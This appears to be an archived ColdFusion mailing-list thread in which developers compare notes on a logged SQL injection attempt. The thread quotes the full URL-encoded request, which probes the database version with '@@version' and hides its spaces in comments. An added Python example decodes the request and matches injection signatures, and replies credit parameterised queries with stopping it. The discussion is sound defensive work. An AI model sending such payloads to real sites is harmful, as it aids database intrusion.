RE: Another weird SQL Injection attempt

2012-10-01 Thread Robert Harrison

Hmmm. One of my sites also had this exact attack (and some variations tried 
about a dozen times) yesterday also. 

Robert Harrison 
Director of Interactive Services

Austin  Williams
Advertising I Branding I Digital I Direct  
125 Kennedy Drive,  Suite 100   I  Hauppauge, NY 11788
T 631.231.6600 X 119   F 631.434.7022   
http://www.austin-williams.com

Blog:  http://www.austin-williams.com/blog
Twitter:  http://www.twitter.com/austin_wi

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:352792
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm


Another weird SQL Injection attempt

2012-09-30 Thread Les Mizzell

Never seen this before! Script in Application file, as usual, caught it 
before it got further...

Here's what was tried:


/index.cfm?action=dance.school%29%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version--40version--=MSOTlPn_View=0MSOTlPn_ShowSettings=False%27%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29--MSOGallery_SelectedLibrary=MSOGallery_FilterString=MSOTlPn_Button=none__REQUESTDIGEST=MSOAuthoringConsole_FormContext=MSOAC_EditDuringWorkflow=MSOSPWebPartManager_DisplayModeName=BrowseMSOWebPartPage_Shared=MSOLayout_LayoutChanges=MSOLayout_InDesignMode=MSOSPWebPartManager_OldDisplayModeName=BrowseMSOSPWebPartManager_StartWebPartEditingName=falseASB_TextDT_Props=ASB_DateTimeDT_Props=Write%23%3B%23CreatedASB_ResType_Query=__VIEWSTATE=PostList%24ctl06%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl07%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl08%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl09%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl10%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl11%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl12%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl13%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl14%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl15%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl16%24ctl26%24ctl01=nochange00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%240=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%241=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%242=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%243=ctl00%2
4ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%244=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%245=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%246=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%247=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%248=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%249=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%2410=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%2411=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%2412=ctl00%24ContentP


Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:352784
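
What the logged request in the post above looks like once decoded, as an added example (not code from the thread, and not the Application-file script Les mentions): a small Python checker that percent-decodes the query string, collapses `/**/` comments and reports which injection markers are present. The function names, signature names and patterns are assumptions chosen for illustration; the two sample strings are fragments copied from the request above.

```python
import re
from urllib.parse import unquote

# Two fragments copied from the request quoted above; the long run of
# ASP.NET/SharePoint form-field names that follows them is left out.
SAMPLES = [
    "/index.cfm?action=dance.school%29%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version--",
    "MSOTlPn_ShowSettings=False%27%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29--",
]

COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Illustrative signatures (assumptions for this example, not a full rule set).
# They run on the normalized text, so encoding tricks cannot hide them.
SIGNATURES = {
    "context-breakout": re.compile(r"'|\)\)"),
    "or-comparison": re.compile(r"\bor\s+\S+?\s*=\s*\S+", re.I),
    "server-variable": re.compile(r"@@\w+"),  # @@name: SQL Server/Sybase/MySQL syntax
    "sql-line-comment": re.compile(r"--"),
}

def decode_fully(raw, max_rounds=3):
    """Percent-decode until stable, so double-encoded input is also covered."""
    for _ in range(max_rounds):
        nxt = unquote(raw)
        if nxt == raw:
            break
        raw = nxt
    return raw

def inspect_request(raw):
    """Return (normalized_text, sorted names of the markers found)."""
    decoded = decode_fully(raw)
    normalized = COMMENT.sub(" ", decoded)  # the SQL parser treats /**/ as whitespace
    hits = {name for name, rx in SIGNATURES.items() if rx.search(normalized)}
    if normalized != decoded:
        hits.add("comment-as-whitespace")
    return normalized, sorted(hits)

if __name__ == "__main__":
    for sample in SAMPLES:
        text, hits = inspect_request(sample)
        print(text, hits)
```

The two fragments differ only in how they try to close the surrounding SQL context (`))` versus `'`). Pattern matching of this kind is a tripwire for logging and blocking; the parameter binding mentioned later in the thread is what keeps the value out of the SQL text.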


Re: Another weird SQL Injection attempt

2012-09-30 Thread Scott Slone

Just battled this today myself...

Here's some more information on it.

https://isc.sans.edu/diary.html?storyid=12127


On 9/30/12 5:58 PM, Les Mizzell lesm...@bellsouth.net wrote:

> Never seen this before! Script in Application file, as usual, caught it
> before it got further...
>
> Here's what was tried:



Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:352785


Re: Another weird SQL Injection attempt

2012-09-30 Thread Wil Genovese

Looks like the same attack tried my servers too - too bad for them it failed. 
Long Live CFQueryParam amongst other little tools. Oh, and running PostgreSQL 
database :-)


Wil Genovese
Sr. Web Application Developer/
Systems Administrator
CF Webtools
www.cfwebtools.com

wilg...@trunkful.com
www.trunkful.com

On Sep 30, 2012, at 8:01 PM, Scott Slone wrote:

> Just battled this today myself...
>
> Here's some more information on it.
>
> https://isc.sans.edu/diary.html?storyid=12127
>
> On 9/30/12 5:58 PM, Les Mizzell lesm...@bellsouth.net wrote:
>
>> Never seen this before! Script in Application file, as usual, caught it
>> before it got further...
>>
>> Here's what was tried:
 
 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:352786